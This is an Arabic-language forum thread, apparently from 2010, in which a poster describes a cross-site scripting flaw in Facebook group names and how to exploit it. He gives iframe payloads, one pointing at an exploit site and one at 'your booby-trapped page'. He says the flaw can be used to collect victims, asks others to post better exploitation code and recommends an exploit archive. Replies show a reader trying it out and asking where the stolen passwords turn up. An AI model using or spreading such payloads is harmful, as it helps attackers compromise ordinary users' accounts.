و اولا هذا شرح لاى ثغرة باسم XSS و هذا للناس المش عارفين ما هيا ثغرات XSS ( http://ar.wikipedia.org/wiki/%D8%A8%...A7%D9%82%D8%B9 ) موضوع النهاردة...

ثغرة ( Facebook XSS Vulnerability ) و شرحها
salam-coeur1.gif


و اولا هذا شرح لاى ثغرة باسم XSS و هذا للناس المش عارفين ما هيا ثغرات XSS

( http://ar.wikipedia.org/wiki/%D8%A8%...A7%D9%82%D8%B9 )
موضوع النهاردة مميز جدااا و ثغرة لسا طازة
1.gif
, و تاريخ نزولها ( 2010-04-02 ) يعنى جديدة شوية
1.gif


المهم الثغرة عبارة عن تخترق اى حد من فيس بوك بمجرد دخول على جروب الانتا عملوا
1.gif
يعنى ممكن من هذة الثغرة

تخترق هكر محترف لو ضغط على الجروب
1.gif
يعنى حاجة مميزة جدااا جدااا شوفوا الثغرة عبارة عن ( Facebook XSS Vulnerability )

و ثغرة عبارة عن فكرة حلوا و هيا حسب الفهمتوا من شرح الموجود فى ثغرة
1.gif


ان انا بعمل جروب باسم جافا سكربت ( يعنى مثلا : كود:
<iframe src=http://inj3ct0r.com></iframe>
)

و هذة صور توضيح للفكرة : -

97662321.jpg


63048167.jpg


طب اية الفكرة
1.gif
بكل اختصار انا فهمت ان فيس بوك يستخدم سكربت كثيرة يعنى ممكن ان تعمل اى امر تطبيق للجافا

حتا لو امر ينفذ باتش او سيرفر
1.gif
يعنى شوف مدى الخطورة , لا و اية كمان ممكن تنشر جروب و تجمع ضحايا كلهم من فيس بوك .
.

51.gif


هذة الثغرة

http://inj3ct0r.com/exploits/11577

و على فكرة لو حد عايز يفهم الثغرة لوحدة علشان يتاكد من كلمى >ابد قراءة من هنا ( :::::::::: How to exploit this )

51.gif


و طبعا بعد هذا ارجوا ان ثغرة تنال اعجبكم

بس انا عايز من المختصين فى ( HTML or Java Script code ) ان ينزلوا كود لهذة ثغرة او احسن استغلال لهذة كود ..

ياريت حد يضع كود مميز ,و يجربوا قبل ما يضع الكود
1.gif
هذا امنية
159.gif
...

و انا هساهم باول كود الموجود فى ثغرة
1.gif
( كود:
<iframe src=رابط صفختك الملغومة></iframe>
) ...

و فى نصيحة لاعضاء ديف بوينت المميز ( هيا : احسن و اكبر موقع ثغرات هوا هذا http://inj3ct0r.com


:yipi:
 
ثغرة ( Facebook XSS Vulnerability ) و شرحها
مشكور اخي جاري التجريب

بس ان مافهمت وين راح تلقى الباسوردات الخ
 

rimox

New Member
ثغرة ( Facebook XSS Vulnerability ) و شرحها
رد: ثغرة ( Facebook XSS Vulnerability ) و شرحها

mafhémtsh
 
أعلى